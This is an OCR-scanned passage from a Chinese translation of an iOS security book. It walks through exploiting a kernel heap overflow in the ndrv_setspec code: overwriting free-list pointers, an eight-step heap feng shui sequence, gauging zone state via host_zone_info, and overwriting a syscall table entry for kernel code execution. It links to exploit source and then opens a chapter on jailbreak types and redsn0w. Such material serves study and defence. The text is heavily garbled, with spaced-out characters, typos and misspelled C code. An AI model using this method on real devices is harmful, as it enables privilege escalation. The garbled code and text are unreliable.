让 重 写 过 的 指针 成 为 自由 列表 的 新 表 头 。 因 此 ， 随 后 的 下 一 次 分 配 会 返回 由 攻击 者 提供 的 指针 。 
因为 该 指针 可 以 指向 内 存 中 的 任何 位 置 , 所 以 这 可 能 导致 任意 内 存 重 写 , 具体 取决 于 内 核 代 码 如 
何 使 用 所 返回 的 内 存 。 在 已 公开 的 针对 naqrv 漏 洞 的 攻击 程序 中 ， 这 是 用 来 重 写 系统 调用 处 理 程 
序 207 的 ， 从 而 允许 任意 内 核 代码 执行 。 

2. 内 核 堆 风 水 

就 像 用户 空 间 的 堆 漏 洞 攻击 那样 , 在 对 内 核 堆 进行 漏洞 攻击 时 最 大 的 问题 是 执行 漏洞 攻击 时 
堆 最 初 处 于 未 知 状态 。 这 很 糟糕 ,因为 想 成 功利 用 堆 洪 出 漏洞 就 要 控制 溢出 块 与 要 重 写 的 自由 块 
间 的 相对 位 置 。 为 了 实现 这 一 目标 ， 人 们 开发 了 多 项 不 同 的 技术 。 传统 的 堆 溢 出 漏洞 攻击 用 到 了 
堆 喷 射 技术 , 用 足够 多 的 内 存 块 填 满 堆 ， 这 样 一 来 重 写 感 兴趣 内 存 块 的 概率 就 非常 高 。 不 过 这 种 
方法 非常 不 可 靠 , 需要 进行 改进 。 因 此 ， 人 们 设计 了 一 种 更 加 周到 的 技术 ,让 漏洞 攻击 变 得 更 加 
可 靠 。 这 一 技术 就 是 堆 风水 ( heap feng shui )， 我 们 在 第 7 章 中 已 经 讨论 过 。 

回想 一 下 ， 这 项 技术 就 是 个 简单 的 多 步 过程 ， 它 会 试 着 让 堆 进 入 受 攻击 者 控制 的 状态 。 要 在 
内 核 漏洞 攻击 中 执行 该 过 程 , 首先 要 有 从 用 户 空间 分 配 和 释放 任意 大 小 内 存 块 的 方式 。 这 表示 大 
家 需要 扫描 所 有 可 获得 的 内 核 功能 , 查找 允许 按 攻击 者 提供 的 大 小 分 配 和 释放 内 存 的 函数 。 对 于 
ndqrv_setspec () 漏洞 来 说 ， 大 家 在 同一 文件 中 就 能 找到 满足 要 求 的 函数 。ndqrv_connect () 
函数 是 连接 ndqrv 套 接 字 时 要 调用 的 处 理 程序 。 有 了 它 ， 你 就 可 以 通过 提供 不 同 长 度 的 套 接 字 名 
称 分 配 不 同 大 小 的 内 核 内 存 。 

static int 


ndrv_connect (struct socket *so, struct sockaddr *nam, _ _ unused struct proc *p) 


{ 



















































































struct ndrv_ cb *np = sotondrveb(so): 
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i (np. == 0} 
return EINVAL; 





if (np->nd_ faddr) 
return EISCONN; 





/* 分 配 内 存 以 存储 远程 地 址 */ 
MALLOC (np->nd_faddr, struct sockaddr ndrv*, 
nam->sa_len, M IFADDR, M WAITOK); 
if (np->ngd_ faddr == NULL) 
return ENOMEM; 











bcopy( (caddr_t) nam, (caddr t) np->nd faddr, nam->sa_len); 
soisconnected(so); 
return 0; 


} 
在 已 连接 的 套 接 字 上 调用 close () 再 断 开 连接 , 这 样 就 可 执行 从 用 户 空间 释放 这 些 内 存 的 操 
作 。 这 是 在 ndrv_do_disconnect() 函数 中 实现 的 : 





statice int 
ndrv_do_disconnect (struct ndrv_cb *np) 
{ 

struct socket * so = np->ngd_ socket; 
#if NDRV_DEBUG 

kprintf ("NDRV disconnect: %x\n", np); 
#endif 

if (np->ngd_ faddr) 

{ 





FREE (np->nd_faddr, M_ IFADDR); 
np->nd_faddr = 0; 











} 

if (so->so_state & SS_NOFDREF) 
ndrv_do_detach (np); 

soisdisconnected(so); 

return(0); 





} 

现在 大 家 有 办 法 从 用 户 空间 分 配 和 释放 内 核 内 存 了 , 这 也 可 以 用 于 执行 堆 风 水 技术 。 这 项 技 
术 假 设 我 们 首先 从 处 于 未 知 状态 的 推 开 始 ， 这 表示 有 若干 已 分 配 的 块 以 及 若干 大 小 不 等 空 着 的 
“ 坑 ”。 这 些 已 分 配 块 的 位 置 和 这 些 “ 坑 ”的 数量 都 是 未 知 的 。 基 于 堆 风 水 技术 的 漏洞 攻击 就 会 按 
照 如 下 方式 进行 。 

(1) 分 配 足 够 多 的 内 存 块 把 这 些 “ 坑 ”都 填 上 。 所 需 的 确切 分 配 次 数 通常 是 未 知 的 。 

(2) 分 配 更 多 的 内 存 块 ， 使 这 些 内 存 块 在 内 存 中 相互 邻接 。 

(3) 释放 两 个 邻接 的 内 存 块 。 释 放 顺 序 取决 于 自由 列表 的 实现 方式 。 下 一 次 分 配 应 该 返回 内 
存 中 的 第 一 个 内 存 块 。 

(4) 触发 有 漏洞 的 内 核 函 数 ， 分 配 两 个 内 存 块 中 的 第 一 个 ， 并 将 其 溢出 到 接着 的 自由 块 中 。 

(5) 触发 某 些 内 核 功能 ， 分 配 已 被 重 写 的 自由 块 并 让 已 被 重 写 的 指针 指向 自由 列表 的 表 头 。 
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(6) 触发 更 多 功能 ， 分 配 内 存 ， 从 而 利用 攻击 者 提供 的 指针 ， 而 不 是 使 用 真正 的 内 存 块 。 

(7) 利用 这 一 重 写 任意 内 存 的 机 会 ， 重 写 某 些 函数 指针 ， 比 如 系统 调用 表 中 某 个 未 使 用 的 处 
理 程序 。 

(8) 触发 被 重 写 的 系统 调用 ， 在 内 核 空 间 中 执行 任意 代码 。 

虽然 第 一 步 要 对 分 配 的 次 数 进 行 猜测 ， 但 基于 堆 风 水 技术 的 漏洞 攻击 通常 非常 稳定 。 不 过 ， 
Mac OSX 和 iOS 中 的 内 核 空 间 还 送 上 了 一 份 有 助 于 进一步 减少 不 确定 性 的 “礼物 ”。 

3. 内 核 堆 状态 的 检测 

Mac OSX 和 iOS 都 带 有 一 个 非常 有 趣 且 实用 的 mach 陷 阱 一 host_zone_info() 。 该 方法 可 
用 于 查询 与 所 有 由 内 核 的 内 存 域 分 配 程序 注册 的 内 存 域 有 关 的 信息 。 该 函数 并 不 局 限于 root 用 
户 使 用 ， 还 可 以 通过 Mac OS X 预 装 的 /usr/bin/zprint 实 用 工具 从 内 部 使 用 。 对 于 每 个 内 存 域 
来 说 ， 它 会 以 填充 好 的 zone_info 结 构 体 的 形式 返回 信息 : 


typedef struct zone_info { 
































integer t zi_ count; /* 现在 所 使 用 的 元 素 的 数量 */ 

vm_size t zi_ cur size; /* 当前 的 内 存 占 用 率 */ 

vm_size t zi max size) /* 该 内 存 域 能 增长 到 多 大 */ 

vm_size t zi_ elem size; /* 元 素 的 大 小 */ 

vm size t zi alloc size; /* 更 多 内 存 所 占据 的 大 小 */ 

integer_t zi _ pageable; /* 内 存 域 是 否 可 分 页 ? */ 

integer _t zi sleepable; /* 如 果 为 空 则 sleep? */ 

integer_t zi exhaustible; /* 如 果 为 空 则 仅仅 返回 ? */ 

integer t zi_collectable; /* 是 否 可 对 元 素 进行 垃圾 收集 ? */ 
} zone_info_t; 

















虽然 这 些 可 通过 该 mach 陷 阱 取 回 的 信息 没有 泄露 任何 内 部 的 内 核 内 存 地 址 ,但 让 我 们 能 够 深 
度 洞悉 内 核 内 存 域 分 配 程序 的 状态 。zi_count 字 段 包 含 了 某 个 内 存 域 中 当前 已 分 配 内 存 块 的 数 
量 。 因 为 某 些 内 核 结 构 体 是 存储 在 它们 自 有 的 内 存 域 中 的 , 所 以 该 计数 器 还 可 能 让 大 家 推断 出 其 
他 信息 ， 比 如 运行 中 进程 或 已 打开 文件 的 数量 。 

对 于 内 核 堆 溢出 来 说 , 更 有 意思 的 是 从 最 大 元 素数 中 减 去 已 分 配 内 存 块 的 数量 。 这 个 最 大 元 
素数 是 用 当前 大 小 zi_cur_size 除 以 单个 元 素 的 大 小 zi_elem_size 得 到 的 。 相 减 后 得 到 的 数字 
就 是 某 个 内 存 域 中 自由 内 存 块 的 数量 ， 也 就 是 扒 风 水 技术 中 需要 填 上 的 “ 坑 ” 的 数量 。 因 此 , 在 
iOS 和 Mac OS X 中 ， 我 们 有 可 能 计算 出 填 满 某 一 内 存 域 中 所 有 “ 坑 ” 具 体 需要 进行 多 少 次 分 配 。 

当 某 个 内 存 域 中 的 最 大 元 素数 耗 尽 时 ， 该 内 存 域 就 会 通过 添加 大 小 为 zi_alloc_size 字 节 
的 新 块 扩 大 。 这 一 新 分 配 的 内 存 块 会 被 分 割 为 相互 独立 的 内 存 块 , 并 且 得 到 的 每 个 内 存 块 都 会 被 
放 和 该 内 存 域 的 自由 列表 。 这 是 很 重要 的 ， 因 为 它 颠 倒 了 分 配 的 顺序 ， 而 且 还 意味 着 只 有 同一 次 
扩大 操作 中 添加 的 内 存 块 才 会 在 内 存 域 中 相互 邻接 。 

4. 对 内 核 堆 缓冲 区 溢出 漏洞 的 攻击 

现在 大 家 已 经 了 解 到 内 核 堆 缓冲 区 溢出 漏洞 攻击 背后 的 理论 , 是 时 候 回 到 示例 漏洞 并 解释 针 
对 它 的 漏洞 攻击 了 。 大 家 要 记 住 ， 实 际 的 堆 缓 冲 区 洲 出 是 反复 调用 ndrv_to_ifnet_demux () 
函数 直到 溢出 实际 的 缓冲 区 并 通过 触发 某 个 内 部 错误 条 件 退 出 循环 而 引发 的 : 
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int 

ndrv_to_ifnet demux(struct ndrv_demux_ desc* ndryv, 
struct ifnet_ demux desc* ifdemux) 

{ 


bzero(ifdemux, sizeof (*ifdemux)); 














if (ndrv->type < DLIL_ DESC_ETYPE2) 


/* 使 用 卓 \ 类 型 “， 不 支持 */ 
return ENOTSUP; 





} 
if (ndrv->length > 28) 


return EINVAL; 





} 


ifdemux->type = ndrv->type; 
ifdemux->data = ndrv->data.other; 
ifdemux->datalen = ndrv->length; 


return 0; 
} 
该 函数 接受 来 自用 户 空 间 的 ndrv_demux_qdesc 结 构 体 并 将 其 作为 参数 使 用 ， 然 后 将 其 转换 
成 对 应 内 核 空 间 的 ifnet_demux_desc 结 构 体 。 这 些 结构 体 的 定义 如 下 : 


struct ndrv_demux_desc 


{ 


uintLe. t type; 

Wintli6. t length; 

union 

{ 
u_ int16_t ether_type; 
u_int8_t sap[l3]; 
u_int8_t snap[5]; 
Winte. t other[28]: 

} data; 


} 

struct ifnet_ demux _ desc { 
Uint32. type; 
void *data; 
Wint32 ct datalen; 

于 


这 些 结构 体 的 定义 表明 ， 大 家 能 够 向 溢出 的 缓冲 区 写 入 的 内 容 是 受到 限制 的 。type 字 段 中 
只 能 装 入 大 于 DLIL_DESC_ETYPE2 ( 这 里 被 定义 为 4 ) 的 16 位 值 。datalen 字 上段 只 能 是 小 于 29 的 
值 ， 而 aata 字 段 是 个 指针 ， 指 向 从 用 户 空间 复制 的 结构 体 。 这 是 相当 受 限 的 ， 不 过 大 家 的 目标 
是 重 写 指向 自由 列表 下 一 个 元 素 的 指针 。 因 此 , 大 家 可 以 把 ifnet_demux_desc 结 构 体 中 的 data 
指针 溢出 到 自由 列表 中 的 下 一 个 内 存 块 , 以 此 构造 漏洞 攻击 程序 。 这 表示 一 旦 这 个 自由 块 成 为 自 
由 列表 的 表 头 , 下 一 次 分 配 就 会 返回 从 用 户 空 间 复制 的 结构 体 中 的 内 存 块 。 因 为 大 家 控制 了 那 部 















































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





9.5 小结 245 








分 内 存 的 内 容 , 所 以 也 就 控制 了 前 4 个 字 节 的 内 容 , 而 这 4 个 字 节 据 假设 是 指向 自由 列表 中 下 一 内 
存 块 的 指针 。 因 此 ,大 家 就 控制 了 自由 列表 的 新 表 头 。 我 们 令 它 为 系统 调用 表 中 的 某 个 地 址 ， 然 
后 下 一 次 分 配 就 会 返回 系统 调用 表 中 的 地 址 。 让 内 核 为 其 装 入 受 大 家 控制 的 数据 ,这样 在 调用 被 
重 写 过 的 系统 调用 处 理 程序 后 ， 就 可 以 执行 任意 内 核 代 码 了 。 

因为 可 以 写 人 的 内 容 是 受 限制 的 ， 所 以 这 种 漏洞 攻击 就 要 比 普通 的 堆 缓冲 区 溢出 更 复 森 一 
些 。 不 过 ,因为 大 家 可 以 写 人 一 个 指 问 受 自己 控制 数据 的 指针 ， 所 以 只 需要 再 加 上 一 个 让 自己 能 
在 两 次 ( 而 不 是 一 次 ) 分 配 后 控制 自由 列表 表 头 的 步骤 就 行 了 。 该 漏洞 攻击 程序 的 完整 源 代码 参 
见 http://github.com/stefanesser/ndrv_setspec, 其 中 包含 了 把 该 漏洞 添加 到 当前 内 核 中 以 进行 实验 的 
内 核 补丁 。 






































9.5 小 结 


在 本 章 中 ,大 家 第 一 次 在 本 书 中 真正 接触 iOS 的 内 核 空间 。 这 里 涵盖 了 与 内 核 漏洞 攻击 程序 
开发 有 关 的 不 同 主题 ， 从 提取 并 解密 内 核 二 进 制 文件 开始 ， 直 到 实现 内 核 级 的 任意 代码 执行 。 

大 家 了 解 了 怎样 对 内 核 二 进 制 文件 中 包含 的 IOKit 内 核 驱 动 程序 进行 逆向 分 析 ， 以 及 如 何 找 
到 那些 应 该 对 其 进行 漏洞 审查 的 内 核 代 码 。 我 们 展示 了 利用 另 一 台 计算 机 和 KDP 协 议 对 iOS 内 核 
进行 远程 调试 的 方法 ， 简 化 了 内 核 漏洞 攻击 程序 的 开发 。 

我 们 还 一 起 了 解 了 针对 不 同类 型 内 核 漏 洞 的 攻击 , 包括 利用 任意 内 存 重 写 、 未 初始 化 内 核 变 
量 、 栈 缓冲 区 溢出 和 内 核 空间 中 的 堆 缓冲 区 溢出 进行 的 漏洞 攻击 。 

本 章 最 后 探讨 了 内 核 的 内 存 域 堆 分 配 程序 的 实现 与 针对 它 的 漏洞 攻击 , 并 展示 了 在 内 核 级 的 
堆 缓冲 区 溢出 漏洞 攻击 程序 中 是 如 何 使 用 堆 风 水 技术 的 。 
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如 果 大 家 按照 本 书 中 介绍 的 这 些 示 例 循序 渐进 地 学 习 ， 很 可 能 已 经 在 越狱 过 的 iPhone 上 完成 
了 各 种 实验 并 自行 进行 了 研究 。 这 点 和 很 多 人 一 样 ， 因 为 几乎 所 有 的 iPhone 安 全 研究 都 是 在 越狱 
过 的 设备 上 进行 的 。 不 过 ,对 于 包括 一 些 安全 界 的 人 士 与 Phone 安 全 研究 人 员 在 内 的 大 多 数 人 而 
言 ， 越 狱 的 内 部 原理 却 是 不 为 其 所 知 的。 很 多 人 把 越狱 当成 他 们 在 所 选择 的 工具 上 单 击 “ 越 狱 ” 
按钮 后 起 作用 的 黑 盒 一 一 就 像 变 魔术 一 样 。 这 通常 是 因为 他 们 进行 的 开发 (比如 用 户 空间 的 漏洞 
攻击 程序 ) 并 不 要 求 其 了 解 越狱 的 内 部 原理 。 

不 过 , 如 果 大 家 想 要 知道 越狱 过 程 的 内 部 工作 原理 ,那么 可 以 在 本 章 中 看 到 很 多 问题 的 答案 。 

在 简要 介绍 不 同 的 越狱 类 型 后 , 我 们 会 以 redsn0w 越 狱 为 例 带 领 大 家 一 步 步 了 解 设备 上 发 生 
的 越狱 过 程 。 本 章 还 介绍 了 越狱 所 应 用 内 核 补丁 的 内 在 原理 ,以 便 大 家 了 解 这 些 补丁 中 哪些 是 必 
要 的 ， 而 哪些 又 是 可 选 的 。 


10.1 为 何 越狱 


出 于 对 诸多 原因 的 考虑 ， 用 户 会 为 他 们 的 iOS 设 备 越 狱 。 有 些 人 是 因为 需要 一 个 可 供 开发 软 
件 的 开放 平台 , 有 些 则 是 想 要 完全 控制 其 设备 , 有 些 人 需要 用 越狱 设备 运行 ultrasn0w 这 样 的 软 
件 以 绕 过 手机 运营 商 的 锁定 ， 还 有 些 人 是 为 了 使 用 盗版 应 用 。 

不 过 ， 安 全 研究 人 员 为 iOS 设 备 越狱 则 有 着 其 他 原因 。 正 常情 况 下 iPhone 受到 严格 的 限制 ， 
不 能 执行 未 签名 的 代码 ， 这 是 评估 系统 安全 或 在 系统 中 查找 安全 漏洞 的 工作 所 面临 的 很 大 障碍 。 

即便 是 拥有 苹果 公司 发 放 的 iOS 开 发 账户 ， 因 为 有 沙 盒 和 其 他 限制 ， 能 在 让 hone 上 运行 的 代 
码 也 是 有 限 的 。 例 如 ，iOS 不 允许 进程 执行 其 他 进程 或 派生 进程 。 此 外 ， 沙 盒 会 阻止 研究 者 算 改 
其 他 应 用 程序 的 文件 ， 而 且 给 MobileSafari 附 加 调试 器 也 是 不 可 能 的 。 

虽然 从 普通 的 iPhone 应 用 可 以 检测 正在 运行 的 进程 的 名 称 ,， 但 用 户 没 办 阻止 可 疑 进 程 运行 ， 
也 不 能 分 析 这 些 进 程 在 做 些 什 么 。 如 果 没 有 可 用 的 越狱 ，iPhone 的 “位 置 门 ”事件 ( 因为 bug 导 
致 用 户 的 定位 信息 被 长 期 存储 在 iPhone 上 ) 就 不 会 大 白 于 天 下 。 

最 为 重要 的 是 ,如果 没 有 公开 发 布 的 越狱 程序 , 本 书 上 介绍 的 大 部 分 研究 也 没 法 进行 。 大 家 
可 能 会 很 停 讶 ， 大 多 数 iPhone 安全 研究 人 员 基 本 上 都 只 是 越狱 工具 的 使 用 者 ， 而 越狱 工具 的 开发 
是 由 iPhone Dev Team 或 Chronic Dev Team 这 样 的 团队 完成 的 。 不 过 , 随 着 硬件 和 软件 的 不 断 进步 ， 
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为 iDOS 设 备 越狱 也 越 来 越 难 了 ， 因 此 最 好 是 有 更 多 安全 界 的 人 士 能 助 越狱 团队 一 臂 之 力 。 和 希望 本 
章 接 下 来 的 内 容 能 让 大 家 有 兴趣 在 以 后 参与 到 越狱 开发 中 。 


10.2 ”越狱 的 类 型 


虽然 多 年 以 来 人 们 已 经 为 使 用 多 数 iOS 版 本 的 记 hone 越 狱 ， 但 并 非 所 有 的 越狱 工具 都 提供 相 
同 的 功能 。 出 现 这 一 情况 的 主要 原因 在 于 , 越狱 的 质量 很 大 程度 上 取决 于 人 们 可 以 找到 哪些 安全 
漏洞 并 利用 它们 突破 设备 的 限制 。 当 然 , 苹果 公司 很 快 就 会 了 解 到 越狱 所 利用 的 漏洞 ,并且 通 常 
会 尽 可 能 在 下 一 版 的 OS 中 修复 这 些 漏洞 。 不 过 ， 有 了 时候 漏洞 是 存在 于 硬件 中 的 ， 所 以 苹果 公司 
没 法 通过 简单 的 软件 升级 修复 这 些 漏 洞 。 只 有 新 硬件 才能 解决 这 一 问题 ,而 苹果 公司 会 花 上 很 长 
一 段 时 间 来 修复 这 些 漏洞 ， 因 为 这 需要 等 到 下 一 代 的 让 hone 或 iPad 发 布 。 


10.2.1 越狱 的 持久 性 


根据 用 于 越狱 的 漏洞 的 不 同 ， 越 狱 的 效果 可 能 是 持久 的 ， 也 可 能 在 设备 关机 再 开机 后 消失 。 
为 了 描述 这 两 种 越狱 , 越狱 界 的 人 士 引 入 了 不 完美 越狱 (tetheredjailbreak ) 和 完美 越狱 ( untethered 
jailbreak ) 这 两 种 说 法 。 

1. 不 完美 越狱 

所 谓 不 完美 越狱 就 是 指 当 设备 重启 后 会 消失 的 越狱 , 使 用 者 在 每 次 重启 设备 后 都 要 重新 为 设 
备 越狱 。 这 往往 意味 着 每 次 开关 机 时 都 要 将 设备 连接 到 计算 机 上 。 因 为 这 一 过 程 要 用 到 USB 连 接 
线 ， 所 以 “不 完美 ”( tethered ) "是 说 得 通 的 。 不 过 ,就 算 不 需要 USB 连 接 , 这 也 需要 访问 特定 网 
站 或 执行 特定 应 用 程序 重新 越狱 ， 而 这 也 符合 “不 完美 ”的 说 法 。 

如 果 要 利用 的 漏洞 位 于 某 些 具有 特权 的 代码 中 , 不 完美 越狱 就 可 能 只 由 一 个 要 利用 的 漏洞 构 
成 。 当 前 大 多 数 iOS 4 和 iOS 5 的 越狱 工具 都 用 到 的 1imeraln bootrom 漏 洞 攻击 程序 就 是 这 样 一 个 
例子 。 男 一 个 例子 是 针对 iOS 的 USB 内 核 驱动 程序 中 存在 的 漏洞 进行 攻击 的 程序 。 不 过 ， 当 前 尚 
未 有 这 样 的 漏洞 或 攻击 程序 公开 。 

如 果 没 有 这 样 的 漏洞 或 攻击 程序 可 利用 , 要 侵入 设备 就 可 能 要 利用 特权 更 少 的 应 用 程序 ( 比 
如 MobileSafari ) 中 存在 的 漏洞 。 不 过 ， 这 种 漏洞 没 法 单独 构成 越狱 ， 因 为 如 果 没 有 额外 的 内 核 
漏洞 攻击 程序 ， 就 不 可 能 禁用 所 有 的 安全 功能 。 

所 有 不 完美 越狱 可 能 是 由 一 个 针对 特权 代码 的 漏洞 攻击 程序 构成 , 或 是 由 一 个 针对 非特 权 代 
码 的 漏洞 攻击 程序 加 上 一 个 提升 权限 的 漏洞 攻击 程序 构成 。 

2. 完美 越狱 

完美 越狱 是 指 那些 利用 了 持久 漏洞 的 越狱 , 它们 在 重启 设备 后 也 不 会 消失 。 之 所 以 说 它们 是 
完美 ( untethered ) 越狱 ， 是 因为 使 用 者 不 用 在 每 次 重启 设备 后 都 重新 越狱 。 因 此 ， 它 们 是 更 佳 
的 越狱 形式 。 































































































































































































Q tethered 原 指 “ 被 绳子 挫 住 的 "， 设 备 要 用 USB 连 接线 连 到 计算 机 上 正 合乎 这 一 解释 。 译 者 注 
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因为 完美 越狱 需要 引导 链 中 非常 特定 的 位 置 出 现 漏洞 ,所 以 实现 起 来 自然 要 难得 多 ,在 过 去 ， 
这 是 可 以 实现 的 , 因为 人 们 在 硬件 中 发 现 了 非常 严重 的 漏洞 , 使 得 在 引导 链 中 对 设备 进行 漏洞 攻 
击 变 得 非常 容易 。 不 过 现在 这 些 漏洞 都 已 经 不 存在 了 ， 而 且 同 等 水 平 的 漏洞 似乎 还 没有 出 现 。 

因此 ， 完 美 越狱 通常 由 某 些 不 完美 越狱 结合 可 以 在 设备 上 持久 存在 的 其 他 漏洞 攻击 程序 形 
成 。 于 是 , 最 初 的 不 完美 越狱 用 来 把 附加 的 漏洞 攻击 程序 安装 到 设备 的 根 文件 系统 中 。 我 们 还 必 





























须 拥有 男 两 个 漏洞 攻击 程序 ， 因为 首先 必须 要 能 执行 任意 未 签名 的 代码 , 然后 需要 提升 权限 才能 
给 内 核 打 补丁 。 


接 下 来 我 们 全 观 相关 内 容 ， 让 大 家 掌握 为 设备 彻底 越狱 所 需要 的 具体 操作 。 
10.2.2 ”漏洞 攻击 程序 的 类 型 


漏洞 的 位 置 会 影响 你 对 于 设备 的 访问 级 别 。 一 些 漏洞 可 以 提供 底层 的 硬件 访问 ， 而 另 一 些 只 
能 给 予 沙 盒 内 的 有 限 权 限 。 

1. bootrom 级 

在 越狱 开发 者 看 来 ，bootrom 级 的 漏洞 是 最 为 强大 的 漏洞 。bootrom 包 含 在 了 Phone 的 硬件 中 ， 
推送 软件 更 新 没 法 修复 其 中 的 漏洞 ， 唯 一 的 方法 就 是 推出 下 一 代 的 硬件 。 尽 管 在 使 用 AS 处 理 器 
的 设备 iPad 2 和 iPhone 4S 投 放 市 场 之 前 ，1imeraln 漏 洞 已 经 存在 很 长 一 段 时 间 了 ， 但 苹果 公司 
并 没有 推出 iPad 或 iPhone 4 的 修正 版 。 

bootrom 级 的 漏洞 之 所 以 最 强大 ， 不 只 是 因为 这 些 漏洞 没 法 修复 ， 还 在 于 它们 让 大 家 能 够 替 
换 或 修改 整个 引导 链 的 每 一 部 分 , 包括 内 核 的 引导 参数 。 此 外 ， 因 为 漏洞 攻击 发 生 在 引导 链 非常 
靠 前 的 时 期 ， 所 以 漏洞 攻击 有 效 载 荷 可 以 得 到 对 硬件 的 完全 访问 权 。 例 如 , 我 们 可 以 使 用 AES 硬 
件 加 速 器 的 GID 密 钥 为 IMG3 文 件 解 密 ， 这 样 就 可 以 解密 新 的 OS 更 新 了 。 

2. iBoot 级 

就 它们 可 以 提供 的 特性 而 言 ，iBoot 中 的 漏洞 几乎 与 bootrom 中 的 漏洞 同样 强大 。 这 些 漏洞 的 
不 足 之 处 在 于 iBoot 没 有 烧 录 到 硬件 中 ， 因 此 只 要 通过 软件 升级 就 能 修复 这 些 漏洞 。 

除 此 之 外 ，iBoot 在 引导 链 中 仍 处 于 足够 早期 的 位 置 ， 此 时 我 们 可 以 为 内 核 提 供 引导 参数 、 
为 内 核 打 补丁 ,或 直接 把 硬件 用 于 执行 GID 密 钥 的 AES 操 作 。 

3. 用 户 空 间 级 

像 JBME3 ( http://jailbreakme.com ) 这 样 的 用 户 空间 越狱 则 完全 基于 用 户 空间 进程 中 的 漏洞 。 
这 些 进程 要 么 是 以 root 用 户 权 限 运 行 的 ( 如 果 它 们 是 系统 进程 )， 要 么 是 以 权限 较 低 的 用 户 〈 比 
如 mobile 用 户 ) 权限 运行 的 ( 如 果 它 们 是 用 户 应 用 程序 )。 在 这 两 种 情况 下， 我 们 都 至 少 需 要 两 
个 漏洞 攻击 程序 才能 为 设备 越狱 。 第 一 个 漏洞 攻击 程序 要 让 设备 能 执行 任意 代码 , 而 第 二 个 漏洞 
攻击 程序 则 要 以 一 种 禁用 内 核 安全 限制 的 方式 提升 权限 。 

在 以 前 版 本 的 OS 中 ， 只 要 被 攻击 的 进程 是 以 root 用 户 权 限 运 行 , 就 有 可 能 从 用 户 空间 禁用 
代码 签名 ; 而 现在 想 要 禁用 代码 签名 机 制 ， 必 须要 中 断 内 核 内 存 或 执行 内 核 代码 。 

与 bootrom 和 认 oot 级 的 漏洞 相 比 ， 用 户 空间 的 漏洞 没有 那么 强大 ， 因 为 即便 能 够 执行 内 核 代 
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码 ， 像 AES 加 速 器 的 GID 密 钥 这 样 的 一 些 硬 件 功 能 也 不 能 再 使 用 了 。 此 外 ， 苹 果 公 司 也 更 容易 修 
复 这 些 用 户 空间 的 漏洞 ， 而 且 通 常会 很 快 修复 远程 用 户 空 间 漏洞 ， 因 为 这 些 漏洞 也 可 能 用 来 让 
iPhone 感染 恶意 软件 。 


10.3 ”理解 越狱 过 程 


本 节 要 介绍 redsn0w( 红 雪 ) 越 狱 工 具 的 内 部 工作 机 制 。 该 工具 是 由 让 hone Dev Team 开 发 的 ， 
可 以 从 其 网 站 http://blog.iphone-dev.org/ 下 载 。 这 是 当前 为 A5 处 理 器 出 现 之 前 的 苹果 设备 越狱 时 最 
常用 到 的 工具 ， 因 为 它 可 以 支持 绝 大 多 数 的 OS 版 本 , 非常 易于 使 用 , 而且 似乎 是 最 稳定 的 越狱 ， 
在 Windows 和 Mac OS X 操 作 系 统 中 都 可 以 使 用 。 

有 了 redqsnow， 越 狱 不 过 就 是 点 击 几 个 按钮 ， 并 把 记 hone 设 置 成 DFU ( Device Firmware 
Upgrade， 设 备 固件 升级 ) 模式 。 这 样 一 来 ， 越 狱 就 算 对 那些 想 为 iPhone 越 狱 的 新 手 用 户 来 说 都 
足够 简单 。 图 10-1 展 示 了 redsn0w 的 欢迎 界面 。 












































图 10-1 redsn0w 的 启动 画面 


在 点 击 Jailbreak ( 越狱 ) 按钮 后 ，redsn0w 会 引导 使 用 者 把 iPhone 设置 成 DFU 模 式 ， 然 后 根 
据 使 用 者 连接 的 设备 提供 一 些 可 供 选 择 的 不 同 越狱 功能 。 使 用 者 只 要 选 定 选项 〈 例如 多 任务 手 
势 )， 点 击 Next 按 钮 ， 然 后 等 着 redsn0w 完 成 工作 就 行 了 。 

虽然 在 用 户 眼 里 这 是 个 非常 简单 的 过 程 , 但 幕后 其 实 发 生 了 很 多 事情 , 而 且 除 了 越狱 领域 的 
一 部 分 人 , 没 人 真正 了 解 发 生 的 这 些 事 。 通 读 接 下 来 的 几 节 后 ,相信 大 家 就 能 够 成 为 了 解 redsn0w 
内 部 工作 机 制 的 一 员 了 。 
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接 下 来 这 几 节 中 所 有 的 信息 都 是 在 原作 者 的 许可 下 , 从 redsn0ow 越 狱 工具 的 反 编译 文件 中 提 
取出 来 的 。 因 为 Pad2 或 iPhone 4S 这 样 的 A5 设 备 不 存在 已 经 公开 的 bootrom 漏 洞 ， 任 何 针对 这 些 设 
备 的 越狱 都 是 用 户 空间 级 别 的。 不 过 ， 这 只 意味 着 前 两 步 操作 ( 从 bootrom 进 行 漏洞 攻击 并 引导 
ramdisk ) 必须 替换 成 类 似 于 先 对 MobileSafari 进 行 漏洞 攻击 再 利用 内 核 漏 洞 的 两 步 操作 。 剩 下 的 
越狱 过 程 都 是 相同 的 。 





























10.3.1 ”对 bootrom 进 行 漏洞 攻击 


redsn0w 的 越狱 过 程 首先 会 利用 1imeraln ( 绿 雨 ) DFU bootrom 漏 洞 攻击 程序 以 能 达到 的 最 
高 特权 等 级 执行 代码 。 要 攻击 的 漏洞 是 A5 问 世 之 前 的 设备 中 bootrom 的 USB DFU 栈 存在 的 堆 缓冲 
区 洪 出 。 我 们 在 这 里 不 会 讨论 该 漏洞 的 具体 信息 ， 如 果 大 家 对 该 漏洞 感 兴趣 的 话 ， 可 以 在 
THEiPHONEWiKi ( http://theiphonewiki.com/wiki/index.php?title=Limeraln Exploit) 之 类 的 地 方 找 
到 对 该 漏洞 的 描述 以 及 漏洞 攻击 程序 。 

对 于 我 们 要 介绍 的 内 容 来 说 ， 大 家 唯一 需要 了 解 的 就 是 该 漏洞 攻击 程序 会 给 bootrom 代 码 中 
的 签名 验证 打上 补丁 ， 从 而 使 大 家 能 引导 任意 ramdisk， 并 为 LLB ( Low-Level-Bootloader， 底 层 
引导 加 载 程 序 )、iBoot 和 内 核 打 补丁 。Chronic Dev Team 在 GitHub 上 放出 了 能 执行 这 些 操作 的 源 
代码 ( https://github.cony/Chronic-Dev/syringe )。 如 果 大 家 想 从 头 开 始 编写 自己 的 越狱 工具 ， 这 是 
个 不 错 的 起 点 ， 因 为 redsn0w 的 源 代码 没有 公开 。 




















10.3.2 引导 ramdisk 


redsn0w 利 用 1imeraln 漏 洞 攻 击 程 序 引 导 修 改过 的 系统 ， 该 系统 使 用 了 打 过 补丁 的 内 核 和 
预先 定制 的 ramdisk。 内 核 被 打上 了 若干 个 越狱 补丁 ， 从 而 允许 执行 未 签名 代码 。 不 过 ， 这 里 面 
